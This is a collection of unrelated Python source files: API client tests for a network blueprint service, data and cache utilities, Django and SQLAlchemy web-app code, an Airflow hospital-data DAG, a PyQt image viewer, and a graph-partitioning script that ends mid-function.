resp=json.dumps({"id": bp_rtr_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/external-router-links",
status=200,
resp=read_fixture(ext_rlinks),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/external-router-links/{bp_rtr_id}",
status=200,
resp=read_fixture(ext_rlinks_id),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/external-routers/{bp_rtr_id}",
status=204,
resp=json.dumps({"id": bp_rtr_id}),
)
aos_session.add_response(
"PUT",
f"http://aos:80/api/blueprints/{bp_id}/external-router-links/{bp_rtr_id}",
status=204,
resp=json.dumps({"id": bp_rtr_id}),
)
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/external-routers/{bp_rtr_id}",
status=200,
resp=read_fixture(bp_ext_rtr_fixture),
)
resp = aos_logged_in.blueprint.apply_external_router(
bp_id=bp_id, ext_rtr_name=bp_rtr_name
)
assert resp == bp_rtr_id
def test_get_anomalies_list_clear(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
status=200,
params={"exclude_anomaly_type": []},
resp=json.dumps({"items": [], "count": 0}),
)
assert aos_logged_in.blueprint.anomalies_list(bp_id=bp_id) == []
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
params={"exclude_anomaly_type": []},
json=None,
headers=expected_auth_headers,
)
def test_get_anomalies_list(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
a_fixture = f"aos/{aos_api_version}/blueprints/bp_anomalies.json"
bp_id = "evpn-cvx-virtual"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
status=200,
params={"exclude_anomaly_type": []},
resp=read_fixture(a_fixture),
)
expected = [
Anomaly(
type="config",
id="c43fcab1-0c74-4b2c-85de-c0cda9c32bd7",
system_id="525400CFDEB3",
severity="critical",
)
]
assert aos_logged_in.blueprint.anomalies_list(bp_id=bp_id) == expected
aos_session.request.assert_called_once_with(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/anomalies",
params={"exclude_anomaly_type": []},
json=None,
headers=expected_auth_headers,
)
def test_get_all_tor_nodes(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
node_fixture = f"aos/{aos_api_version}/blueprints/qe_get_nodes.json"
rd_node_fixture = f"aos/{aos_api_version}/blueprints/qe_get_rd_nodes.json"
bp_id = "evpn-cvx-virtual"
mlag_node1 = "d704d6f7-6070-4fef-ae99-99a94e08bf62"
mlag_node2 = "ef9b2dfb-3e12-4f73-8ec5-7c23911f3b99"
single_node = "9e75966c-bfad-4ed1-83f9-282f552b24b2"
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
params=None,
resp=read_fixture(node_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
params=None,
resp=read_fixture(rd_node_fixture),
)
aos_session.add_response(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
status=200,
params=None,
resp=read_fixture(rd_node_fixture),
)
assert aos_logged_in.blueprint.get_all_tor_nodes(bp_id)
aos_session.request.assert_has_calls(
[
call(
"POST",
"http://aos:80/api/aaa/login",
json=mock.ANY,
params=None,
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={"query": "match(node('system', name='leaf', role='leaf'))"},
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={
"query": "match(node('redundancy_group', name='rg')"
".out('composed_of_systems')"
".node('system', role='leaf',"
f" id='{mlag_node1}'))"
},
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={
"query": "match(node('redundancy_group', name='rg')"
".out('composed_of_systems')"
".node('system', role='leaf',"
f" id='{single_node}'))"
},
headers=mock.ANY,
),
call(
"POST",
f"http://aos:80/api/blueprints/{bp_id}/qe",
params=None,
json={
"query": "match(node('redundancy_group', name='rg')"
".out('composed_of_systems')"
".node('system', role='leaf',"
f" id='{mlag_node2}'))"
},
headers=mock.ANY,
),
]
)
def test_get_active_tasks_none(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks",
params={"filter": "status in ['init', 'in_progress']"},
status=200,
resp=json.dumps({"items": []}),
)
resp = aos_logged_in.blueprint.get_active_tasks(bp_id=bp_id)
assert resp == []
def test_get_active_tasks(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/tasks",
params={"filter": "status in ['init', 'in_progress']"},
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_bp_active_tasks.json"
),
)
resp = aos_logged_in.blueprint.get_active_tasks(bp_id=bp_id)
assert resp is not None
for i in resp:
assert i["status"] in ["in_progress", "init"]
def test_get_diff_status(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/diff-status",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_diff_status.json"
),
)
assert aos_logged_in.blueprint.get_diff_status(bp_id=bp_id) == {
"status": "undeployed",
"logical_diff_supported": True,
"deployed_version": 0,
"staging_version": 1,
"cache_diff_supported": True,
"deploy_config_version": 0,
"deploy_status_version": 0,
"operation_version": 0,
"deploy_status": "success",
"deploy_error": None,
}
def test_set_bp_node_label(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
node_id = "node_1"
aos_session.add_response(
"PATCH", f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}", status=202
)
assert not aos_logged_in.blueprint.set_bp_node_label(
bp_id=bp_id, node_id=node_id, label="newlabel"
)
aos_session.request.assert_called_once_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}",
json={"label": "newlabel"},
params=None,
headers=expected_auth_headers,
)
def test_set_bp_node_label_with_hostname(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
node_id = "node_1"
aos_session.add_response(
"PATCH", f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}", status=202
)
assert not aos_logged_in.blueprint.set_bp_node_label(
bp_id=bp_id, node_id=node_id, label="newlabel", hostname="newhostname"
)
aos_session.request.assert_called_once_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}",
json={"label": "newlabel", "hostname": "newhostname"},
params=None,
headers=expected_auth_headers,
)
def test_get_cable_map(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/cabling-map",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_cabling_map.json"
),
)
resp = aos_logged_in.blueprint.get_cabling_map(bp_id=bp_id)
assert resp["version"] == 2
assert len(resp["links"]) == 7
def test_update_cabling_map(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
aos_session.add_response(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/cabling-map"
"?comment=cabling-map-update",
status=202,
)
assert not aos_logged_in.blueprint.update_cabling_map(bp_id=bp_id, links=[])
aos_session.request.assert_called_once_with(
"PATCH",
f"http://aos:80/api/blueprints/{bp_id}/cabling-map"
"?comment=cabling-map-update",
json={"links": []},
params=None,
headers=expected_auth_headers,
)
def test_get_rendered_config(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
node_id = "node-1"
config_type = "staging"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/nodes/{node_id}/"
f"config-rendering?type={config_type}",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_rendered_config.json"
),
)
assert aos_logged_in.blueprint.get_rendered_config(
bp_id=bp_id, node_id=node_id, config_type=config_type
) == {"config": "thisistheconfiguration"}
def test_get_endpoint_policies(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
ptype = "staging"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/"
f"experience/web/endpoint-policies?type={ptype}",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_endpoint_policies.json"
),
)
resp = aos_logged_in.blueprint.get_endpoint_policies(bp_id=bp_id)
assert resp["version"] == 1
assert len(resp["endpoint_policies"]) == 0
def test_get_routing_policies(
aos_logged_in, aos_session, expected_auth_headers, aos_api_version
):
bp_id = "test-bp-1"
bp_type = "staging"
aos_session.add_response(
"GET",
f"http://aos:80/api/blueprints/{bp_id}/routing-policies?type={bp_type}",
status=200,
resp=read_fixture(
f"aos/{aos_api_version}/blueprints/" f"get_routing_policies.json"
),
)
resp = aos_logged_in.blueprint.get_routing_policies(bp_id=bp_id)
assert len(resp["items"]) == 1
assert resp["items"][0]["export_policy"] == {
"spine_leaf_links": True,
"loopbacks": True,
"l2edge_subnets": True,
"static_routes": False,
"l3edge_server_links": True,
}
|
import feather
import pandas as pd
def get_df(index):
db = feather.read_dataframe('data/db.feather')
return get_data_df(index, db)
def get_data_df(index, db):
file = db.loc[index]['file']
return feather.read_dataframe('data/{}'.format(file))
def get_df_byname(name):
db = feather.read_dataframe('data/db.feather')
return get_data_df_byname(name, db)
def get_data_df_byname(name, db):
file = db[db['name'] == name]['file'][0]
return feather.read_dataframe('data/{}'.format(file))
|
import cv2
import os, sys
import numpy as np
save_path = 'images/train/'
# Helpful functions #
def save_image(name, img):
if not os.path.exists(save_path):
os.makedirs(save_path)
cv2.imwrite(save_path+name+'.tif', np.array(img, dtype=np.uint8))
def get_api_key():
if len(sys.argv) is 2:
print('Reading API key from input argument')
return sys.argv.pop()
else:
try:
from src import credentials
if hasattr(credentials, 'GOOGLE_MAPS_API_KEY'):
print('Reading API key from credentials.py')
return credentials.GOOGLE_MAPS_API_KEY
except:
if 'GOOGLE_MAPS_API_KEY' in os.environ:
print('Reading API key from environment')
return os.environ['GOOGLE_MAPS_API_KEY']
else:
print('API Key not found.')
sys.exit(1)
|
import contextlib
import os
import shutil
import tempfile
_cache_root = os.environ.get(
'LINEFLOW_ROOT',
os.path.join(os.path.expanduser('~'), '.cache', 'lineflow'))
@contextlib.contextmanager
def tempdir(**kwargs):
ignore_errors = kwargs.pop('ignore_errors', False)
temp_dir = tempfile.mkdtemp(**kwargs)
try:
yield temp_dir
finally:
shutil.rmtree(temp_dir, ignore_errors=ignore_errors)
def get_cache_root() -> str:
return _cache_root
def set_cache_root(path: str) -> None:
global _cache_root
_cache_root = path
def get_cache_directory(cache_name: str,
create_directory: bool = True) -> str:
path = os.path.join(_cache_root, cache_name)
if create_directory:
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
return path
def cache_or_load_file(path, creator, loader):
if os.path.exists(path):
return loader(path)
try:
os.makedirs(_cache_root)
except OSError:
if not os.path.isdir(_cache_root):
raise RuntimeError('cannot create cache directory')
with tempdir() as temp_dir:
filename = os.path.basename(path)
temp_path = os.path.join(temp_dir, filename)
content = creator(temp_path)
if not os.path.exists(path):
shutil.move(temp_path, path)
return content
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render, redirect
from .forms import UploadFileForm
from utils.sudoku_grid import render_sudoku
from solver.solver import solve
from .forms import CreateUserForm
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
import numpy as np
import cv2
def home(request):
return render(request, "home.html", {})
def login_page(request):
form = CreateUserForm()
if request.method == 'POST':
if request.POST.get('submit') == 'register':
form = CreateUserForm(request.POST)
if form.is_valid():
form.save()
return redirect('login')
messages.info(request, 'Failed to register')
elif request.POST.get('submit') == 'login':
username_ = request.POST.get('userName')
pwd = request.POST.get('userPassword')
user = authenticate(request, username=username_, password=pwd)
if user is not None:
login(request, user)
return redirect('home')
else:
messages.info(request, 'Email or password is incorrect')
render(request, "login.html", {'form': form})
return render(request, "login.html", {'form': form})
def logout_user(request):
logout(request)
return redirect('login')
def upload_file(request):
if request.method == 'POST':
sudoku_grid = request.FILES.get("sudokuImage")
form = UploadFileForm(sudoku_grid)
if form.is_valid():
grid = render_sudoku(cv2.imdecode(np.fromstring(sudoku_grid.read(), np.uint8), cv2.IMREAD_UNCHANGED))
request.session['grid'] = grid
return HttpResponseRedirect('correct-sudoku-grid')
return render(request, "upload_file.html", {})
def correct_sudoku(request):
grid = request.session['grid']
if request.method == 'POST':
new_grid = request.POST.get("new_grid")
final_grid = np.fromstring(new_grid, sep=',', dtype='int').reshape([9, 9]).tolist()
request.session['grid'] = final_grid
return HttpResponseRedirect('play-sudoku')
return render(request, "correct_grid.html", {'grid': grid})
def play(request):
grid = request.session['grid']
if request.method == 'POST':
final_grid = request.POST.get("final_grid")
final_time = request.POST.get("final_time")
grid_result = np.fromstring(final_grid, sep=',', dtype='int').reshape([9, 9]).tolist()
final_result = solve(np.array(grid))
if final_result.tolist() == grid_result:
request.session['result'] = "success"
else:
request.session['result'] = "fail"
request.session['final_grid'] = grid_result
request.session['solve_grid'] = final_result.tolist()
request.session['final_time'] = final_time
return HttpResponseRedirect('result')
return render(request, "play_sudoku.html", {'grid': grid})
def result(request):
if 'final_time' not in request.session:
return redirect('upload')
timer = request.session['final_time']
user_grid = request.session['final_grid']
result = request.session['result']
solve_grid = request.session['solve_grid']
tps = timer.split(':')[0]
return render(request, "result.html", {'timer': timer, 'result': result, 'solve_grid': solve_grid, 'tps': tps, 'user_grid': user_grid})
|
#===============================================================
# DMXIS Macro (c) 2010 db audioware limited
#===============================================================
found=False
for ch in GetAllSelCh(True):
nm = GetChName(ch).lower()
if nm=="r" or nm=="g" or nm=="b" or nm=="red" or nm=="green" or nm=="blue":
SelectCh(ch, 1)
found=True
else:
SelectCh(ch, 0)
if not found: Message("No RGB channels found!")
|
import os
from pydantic import BaseSettings
# 로컬에 동일한 이름의 환경변수가 적용되어있으면, 그걸로 덮어지게됨 (printenv 로 확인 필요)
class Settings(BaseSettings):
HOST: str
PORT: int
DATABASE: str
USERNAME: str
PASSWORD: str
class Config:
env_file = os.path.expanduser('~/.env')
env_file_encoding = 'utf-8'
|
import json
import pathlib
import airflow
import requests
import requests.exceptions as requests_exceptions
from airflow import DAG
from airflow.decorators import dag, task
from airflow.operators.subdag_operator import SubDagOperator
from airflow.operators.bash import BashOperator
from airflow.operators.python import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.example_dags.subdags.subdag import subdag
from airflow.utils import timezone
from datetime import datetime, timedelta
from hms_workflow_platform.core.services import *
from hms_workflow_platform.settings import settings
from hms_workflow_platform.core.common.utils.send_messages import SendToRabbit
from hms_workflow_platform.core.services.query.encounter_query_service import EncounterQueryService
from hms_workflow_platform.core.services.query.patient_query_service import PatientQueryService
from hms_workflow_platform.core.services.query.allergy_query_service import AllergyQueryService
from hms_workflow_platform.core.services.query.practitioner_query_service import PractitionerQueryService
from hms_workflow_platform.core.services.query.appointment_query_service import AppointmentQueryService
from hms_workflow_platform.core.services.query.billing_query_service import BillingQueryService
from hms_workflow_platform.core.services.query.payor_query_service import PayorQueryService
from hms_workflow_platform.core.services.template.encounter_template_service import EncounterTemplateService
from hms_workflow_platform.core.services.template.allergy_template_service import AllergyTemplateService
from hms_workflow_platform.core.services.template.appointment_template_service import AppointmentTemplateService
from hms_workflow_platform.core.services.template.billing_template_service import BillingTemplateService
from hms_workflow_platform.core.services.template.patient_template_service import PatientTemplateService
from hms_workflow_platform.core.services.template.payor_template_service import PayorTemplateService
from hms_workflow_platform.core.services.template.practitioner_template_service import PractitionerTemplateService
events = {
"encounter_create": [ None, EncounterQueryService, "fetchCreated" ],
"encounter_update": [ None, EncounterQueryService, "fetchUpdate" ],
"encounter_discharge": [ None, EncounterQueryService, "fetchDischarge" ],
"patient_create": [ None, PatientQueryService, "fetchCreated" ],
"patient_update": [ None, PatientQueryService, "fetchUpdate" ],
"patient_registration": [ None, PatientQueryService, "fetchRegistration" ],
"payor_create": [ None, PayorQueryService, "fetchCreated" ],
"payor_update": [ None, PayorQueryService, "fetchUpdate" ],
"practitioner_create": [ None, PractitionerQueryService, "fetchCreated" ],
"practitioner_update": [ None, PayorQueryService, "fetchUpdate" ],
"allergy_create": [ None, AllergyQueryService, "fetchCreated" ],
"appointment_create": [ None, AppointmentQueryService, "fetchCreated" ],
"billing_create": [ None, BillingQueryService, "fetchCreated" ],
"billing_inprogress_create": [ None, BillingQueryService, "fetchInprogressCreated" ]
}
domains = {
"patient": [ None, PatientTemplateService ],
"encounter": [ None, EncounterTemplateService ],
"payor": [ None, PayorTemplateService ],
"practitioner": [ None, PractitionerTemplateService ],
"allergy": [ None, AllergyTemplateService ],
"appointment": [ None, AppointmentTemplateService ],
"billing": [ None, BillingTemplateService ],
}
#Global parameter
project_name = settings.get("site", "")
default_args = {
'owner': 'HMS-Gateway',
# 'start_date': airflow.utils.dates.days_ago(0, hour=0, minute=0, second=0, microsecond=0),
# 'schedule_interval':"* * * * *",
# 'schedule_interval':None,
}
main_dag = DAG(
dag_id=project_name,
default_args=default_args,
start_date=timezone.utcnow().replace(
second=0,
microsecond=0),
schedule_interval=timedelta(seconds=30),
# schedule_interval=None,
concurrency=20,
)
def _generate_event(**kwargs):
event = kwargs['event']
date_str_yesterday = timezone.utcnow() - timedelta(hours=20)
service = events[event][1]()
service.prepareQuery(settings.get('data_source', ''), settings.get('site', ''))
try:
data_list = getattr(service, events[event][2])(yesterday=date_str_yesterday)
except AttributeError:
return []
return data_list
def generateEventTasks():
for event in events.keys():
operator = DummyOperator(
task_id=f'create_{event}_event',
dag=main_dag,
)
process_task = PythonOperator(
task_id=f'query_{event}',
python_callable=_generate_event,
op_kwargs={'event':event},
dag=main_dag,
)
operator >> process_task
events[event][0] = process_task
def _create_data_template(**kwargs):
task_instance = kwargs['task_instance']
ti = kwargs['ti']
domain = kwargs['domain']
service = domains[domain][1]()
print(f'service:{service}')
service.prepareTemplate(settings.get('data_source', ''))
for event in events.keys():
if domain == event.split('_')[0]:
data_list = ti.xcom_pull(task_ids=f'query_{event}')
# print(f'data_list::{data_list}')
keys = service.generateKey(data_list)
print(f'keys:{keys}')
task_instance.xcom_push(key=event, value=keys)
# return keys
def _handle_data_message_queue(**kwargs):
send_msg = SendToRabbit()
ti = kwargs['ti']
domain = kwargs['domain']
for event in events.keys():
if domain == event.split('_')[0]:
keys = ti.xcom_pull(task_ids=f'create_{domain}_template',key=event)
# print(data_list)
send_msg.send_to_rabbit(domain, keys)
def generateDomainTasks():
for domain in domains.keys():
task_create_key = PythonOperator(
task_id=f'create_{domain}_template',
python_callable=_create_data_template,
op_kwargs={'domain':domain, },
dag=main_dag,
)
handle_message_queue = PythonOperator(
task_id=f'handle_{domain}_message_queue',
python_callable=_handle_data_message_queue,
op_kwargs={'domain':domain},
dag=main_dag,
)
task_create_key >> handle_message_queue
domains[domain][0] = task_create_key
def mapDomainsToEvents():
for key in events.keys():
events[key][0] >> domains[key.split('_')[0]][0]
generateEventTasks()
generateDomainTasks()
mapDomainsToEvents()
|
#!/usr/bin/python
# change this to the IP address and port that will receive our OSC messages, if applicable
remoteIP = '10.0.0.111'
remotePort = 9000
import time, threading
import OSC # requires pyOSC from https://trac.v2.nl/wiki/pyOSC or https://gitorious.org/pyosc
import pygame
sendAddress = (remoteIP, remotePort)
client = OSC.OSCClient() # set up then connect to the OSC receiving server
client.connect((sendAddress)) #not sure if we need both sets of parentheses
def sendOSC(pin, state):
message = OSC.OSCMessage('/output/'+str(pin))
message.append(state)
print message
client.send(message)
pygame.init()
joystickCount = pygame.joystick.get_count()
print (joystickCount, 'joystick(s)')
if joystickCount == 0:
print ('no joysticks attached')
else:
joystickInput = pygame.joystick.Joystick(0)
joystickInput.init()
try:
while 1:
for event in pygame.event.get():
if event.type == 10: # button down
#print event.button
pin = event.button + 1 # since the buttons start at 0
#print pin
sendOSC(pin, 1)
if event.type == 11: # button up
pin = event.button + 1
sendOSC(pin, 0)
#if event.type == 7: # axis move
#print event.axis
#print event.value
pygame.event.clear()
except KeyboardInterrupt:
print 'Done'
|
# This file allows us to define database models. Each model corresponds to a table in
# our relational database. If you've use web frameworks that utilize the
# Model-View-Controller (MVC) architecture, this is a part of the Model portion of that
# architecture, where we define the data structures in our database.
# Ref: https://fastapi.tiangolo.com/tutorial/sql-databases/#create-the-database-models
from sqlalchemy import Column, ForeignKey, Integer, String, Text
from sqlalchemy.orm import relationship
from app.database import Base
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, index=True)
email = Column(String, unique=True, index=True)
hashed_password = Column(String)
notes = relationship("Note", back_populates="author")
class Note(Base):
__tablename__ = "notes"
id = Column(Integer, primary_key=True, index=True)
title = Column(String, index=True)
note = Column(Text)
author_id = Column(Integer, ForeignKey("users.id"))
author = relationship("User", back_populates="notes")
|
# Generated by Django 2.2.9 on 2020-01-24 20:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contact', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ContactMessage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('message', models.TextField(max_length=2000)),
('date_sent', models.DateField(auto_now=True)),
('reply', models.TextField(blank=True, max_length=2000, null=True)),
('date_replied', models.DateField(blank=True, null=True)),
],
),
]
|
'''
Scivi is written/maintained/developed by:
S. Chris Colbert - sccolbert@gmail.com
Scivi is free software and is part of the scikits-image project.
Scivi is governed by the licenses of the scikits-image project.
Please report any bugs to the author.
The scivi module is not meant to be used directly.
Use skimage.io.imshow(img, fancy=True)'''
from textwrap import dedent
import numpy as np
import sys
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import (QApplication, QMainWindow, QImage, QPixmap,
QLabel, QWidget, QVBoxLayout, QSlider,
QPainter, QColor, QFrame, QLayoutItem)
from q_color_mixer import MixerPanel
from q_histogram import QuadHistogram
class ImageLabel(QLabel):
def __init__(self, parent, arr):
QLabel.__init__(self)
self.parent = parent
# we need to hold a reference to
# arr because QImage doesn't copy the data
# and the buffer must be alive as long
# as the image is alive.
self.arr = arr
# we also need to pass in the row-stride to
# the constructor, because we can't guarantee
# that every row of the numpy data is
# 4-byte aligned. Which Qt would require
# if we didnt pass the stride.
self.img = QImage(arr.data, arr.shape[1], arr.shape[0],
arr.strides[0], QImage.Format_RGB888)
self.pm = QPixmap.fromImage(self.img)
self.setPixmap(self.pm)
self.setAlignment(QtCore.Qt.AlignTop)
self.setMinimumSize(100, 100)
self.setMouseTracking(True)
def mouseMoveEvent(self, evt):
self.parent.label_mouseMoveEvent(evt)
def resizeEvent(self, evt):
width = self.width()
pm = QPixmap.fromImage(self.img)
self.pm = pm.scaledToWidth(width)
self.setPixmap(self.pm)
def update_image(self):
width = self.width()
pm = QPixmap.fromImage(self.img)
pm = pm.scaledToWidth(width)
self.setPixmap(pm)
class RGBHSVDisplay(QFrame):
def __init__(self):
QFrame.__init__(self)
self.setFrameStyle(QtGui.QFrame.Box|QtGui.QFrame.Sunken)
self.posx_label = QLabel('X-pos:')
self.posx_value = QLabel()
self.posy_label = QLabel('Y-pos:')
self.posy_value = QLabel()
self.r_label = QLabel('R:')
self.r_value = QLabel()
self.g_label = QLabel('G:')
self.g_value = QLabel()
self.b_label = QLabel('B:')
self.b_value = QLabel()
self.h_label = QLabel('H:')
self.h_value = QLabel()
self.s_label = QLabel('S:')
self.s_value = QLabel()
self.v_label = QLabel('V:')
self.v_value = QLabel()
self.layout = QtGui.QGridLayout(self)
self.layout.addWidget(self.posx_label, 0, 0)
self.layout.addWidget(self.posx_value, 0, 1)
self.layout.addWidget(self.posy_label, 1, 0)
self.layout.addWidget(self.posy_value, 1, 1)
self.layout.addWidget(self.r_label, 0, 2)
self.layout.addWidget(self.r_value, 0, 3)
self.layout.addWidget(self.g_label, 1, 2)
self.layout.addWidget(self.g_value, 1, 3)
self.layout.addWidget(self.b_label, 2, 2)
self.layout.addWidget(self.b_value, 2, 3)
self.layout.addWidget(self.h_label, 0, 4)
self.layout.addWidget(self.h_value, 0, 5)
self.layout.addWidget(self.s_label, 1, 4)
self.layout.addWidget(self.s_value, 1, 5)
self.layout.addWidget(self.v_label, 2, 4)
self.layout.addWidget(self.v_value, 2, 5)
def update_vals(self, data):
xpos, ypos, r, g, b, h, s, v = data
self.posx_value.setText(str(xpos)[:5])
self.posy_value.setText(str(ypos)[:5])
self.r_value.setText(str(r)[:5])
self.g_value.setText(str(g)[:5])
self.b_value.setText(str(b)[:5])
self.h_value.setText(str(h)[:5])
self.s_value.setText(str(s)[:5])
self.v_value.setText(str(v)[:5])
class SciviImageWindow(QMainWindow):
def __init__(self, arr, mgr):
QMainWindow.__init__(self)
self.arr = arr
self.mgr = mgr
self.main_widget = QWidget()
self.layout = QtGui.QGridLayout(self.main_widget)
self.setCentralWidget(self.main_widget)
self.label = ImageLabel(self, arr)
self.label_container = QFrame()
self.label_container.setFrameShape(QtGui.QFrame.StyledPanel|QtGui.QFrame.Sunken)
self.label_container.setLineWidth(1)
self.label_container.layout = QtGui.QGridLayout(self.label_container)
self.label_container.layout.setMargin(0)
self.label_container.layout.addWidget(self.label, 0, 0)
self.layout.addWidget(self.label_container, 0, 0)
self.mgr.add_window(self)
self.main_widget.show()
self.setWindowTitle('Scivi - The skimage viewer.')
self.mixer_panel = MixerPanel(self.arr)
self.layout.addWidget(self.mixer_panel, 0, 2)
self.mixer_panel.show()
self.mixer_panel.set_callback(self.refresh_image)
self.rgbv_hist = QuadHistogram(self.arr)
self.layout.addWidget(self.rgbv_hist, 0, 1)
self.rgbv_hist.show()
self.rgb_hsv_disp = RGBHSVDisplay()
self.layout.addWidget(self.rgb_hsv_disp, 1, 0)
self.rgb_hsv_disp.show()
self.layout.setColumnStretch(0, 1)
self.layout.setRowStretch(0, 1)
self.save_file = QtGui.QPushButton('Save to File')
self.save_file.clicked.connect(self.save_to_file)
self.save_stack = QtGui.QPushButton('Save to Stack')
self.save_stack.clicked.connect(self.save_to_stack)
self.save_file.show()
self.save_stack.show()
self.layout.addWidget(self.save_stack, 1, 1)
self.layout.addWidget(self.save_file, 1, 2)
def closeEvent(self, event):
# Allow window to be destroyed by removing any
# references to it
self.mgr.remove_window(self)
def update_histograms(self):
self.rgbv_hist.update_hists(self.arr)
def refresh_image(self):
self.label.update_image()
self.update_histograms()
def scale_mouse_pos(self, x, y):
width = self.label.pm.width()
height = self.label.pm.height()
x_frac = 1. * x / width
y_frac = 1. * y / height
width = self.arr.shape[1]
height = self.arr.shape[0]
new_x = int(width * x_frac)
new_y = int(height * y_frac)
return(new_x, new_y)
def label_mouseMoveEvent(self, evt):
x = evt.x()
y = evt.y()
x, y = self.scale_mouse_pos(x, y)
# handle tracking out of array bounds
maxw = self.arr.shape[1]
maxh = self.arr.shape[0]
if x >= maxw or y >= maxh or x < 0 or y < 0:
r = g = b = h = s = v = ''
else:
r = self.arr[y,x,0]
g = self.arr[y,x,1]
b = self.arr[y,x,2]
h, s, v = self.mixer_panel.mixer.rgb_2_hsv_pixel(r, g, b)
self.rgb_hsv_disp.update_vals((x, y, r, g, b, h, s, v))
def save_to_stack(self):
from skimage import io
img = self.arr.copy()
io.push(img)
msg = dedent('''
The image has been pushed to the io stack.
Use io.pop() to retrieve the most recently
pushed image.''')
msglabel = QLabel(msg)
dialog = QtGui.QDialog()
ok = QtGui.QPushButton('OK', dialog)
ok.clicked.connect(dialog.accept)
ok.setDefault(True)
dialog.layout = QtGui.QGridLayout(dialog)
dialog.layout.addWidget(msglabel, 0, 0, 1, 3)
dialog.layout.addWidget(ok, 1, 1)
dialog.exec_()
def save_to_file(self):
from skimage import io
filename = str(QtGui.QFileDialog.getSaveFileName())
if len(filename) == 0:
return
io.imsave(filename, self.arr)
|
from graphmix import Graph
import numpy as np
import scipy.sparse as sp
import os
import sys
import math
import argparse
import pickle as pkl
import networkx as nx
'''
Usage example: (in Dir Hetu/)
python ./tests/test_DistGCN/prepare_data_GCN15d.py --size 8 --replication 2 --dataset Reddit
'''
def coo_slice(a, row_range, col_range):
a = a.tocoo()
condition = np.where((a.row >= row_range[0]) & (a.row < row_range[1]) & (
a.col >= col_range[0]) & (a.col < col_range[1]))
return sp.coo_matrix((a.data[condition], (a.row[condition]-row_range[0], a.col[condition]-col_range[0])), shape=(row_range[1]-row_range[0], col_range[1]-col_range[0]))
def get_adj_matrix_all(A, replication, size, dir_name):
node_count = A.shape[0]
n_per_proc = math.ceil(float(node_count) / (size // replication))
stages = size // (replication ** 2)
col_block = stages*n_per_proc
row_block = math.ceil(float(node_count)/(size//replication))
for rank in range(size):
rank_row = rank // replication # i
rank_col = rank % replication # j
col_start = int(col_block*rank_col)
col_end = int(col_block*(rank_col+1))
if col_end > node_count:
col_end = node_count
row_start = int(row_block*rank_row)
row_end = int(row_block*(rank_row+1))
if row_end > node_count:
row_end = node_count
a = coo_slice(A.tocoo(), row_range=(row_start, row_end),
col_range=(col_start, col_end))
sp.save_npz(dir_name+"adj_part"+str(rank)+".npz", a)
print("adj_part: rank = %d" % rank, a.shape, len(a.data))
def get_inputs(H, replication, rank, size):
node_count = H.shape[0]
rank_row = rank // replication # i
row_block = math.ceil(float(node_count)/(size//replication))
